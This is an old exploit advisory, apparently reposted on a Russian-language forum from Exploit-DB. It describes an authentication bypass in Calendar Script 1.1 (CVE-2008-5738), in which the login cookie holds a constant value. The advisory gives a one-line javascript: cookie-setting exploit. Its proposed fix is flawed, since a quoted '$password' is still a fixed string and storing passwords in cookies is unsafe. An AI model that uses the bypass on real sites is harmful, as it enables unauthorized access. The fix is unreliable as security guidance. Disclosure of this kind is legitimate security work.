Exploit Calendar Script 1.1 - Insecure Cookie Handling

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7513
Проверка EDB
  1. Пройдено
Автор
OSIRYS
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-5738
Дата публикации
2008-12-18
Код:
[START]

#########################################################################################
[0x01] Informations:

Script         : Calendar Script v1.1
Download       : http://www.hotscripts.com/jump.php?listing_id=71365&jump_type=1
Vulnerability  : Insecure Cookie Handling
Author         : Osirys
Contact        : osirys[at]live[dot]it
Website        : http://osirys.org
Notes          : Proud to be Italian
Greets:        : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX


#########################################################################################
[0x02] Bug: [Insecure Cookie Handling]
######

Bugged file is: /[path]/index.php

[CODE]

if(mysql_num_rows($checkDetails) > 0) {
    setcookie('nodstrumCalendarV2', '1', time()+3600);	// Cookie will expire in 1 hour.
    // $loginMsg = '<span style="color: green">You are logged in<i>!</i></span>';
}

If we login in correctly, a cookie is created with 'nodstrumCalendarV2' as name and
'1' as content.

## [!] FIX: Change name or content to the cookie. Example:

Код:
if(mysql_num_rows($checkDetails) > 0) {
    setcookie('nodstrumCalendarV2', '$password', time()+3600);	// Cookie will expire in 1 hour.
    // $loginMsg = '<span style="color: green">You are logged in<i>!</i></span>';
}


### [!] EXPLOIT: javascript:document.cookie = "nodstrumCalendarV2=1; path=/";


#########################################################################################

[/END]

# milw0rm.com [2008-12-18][/CODE]
 
Источник
www.exploit-db.com

Похожие темы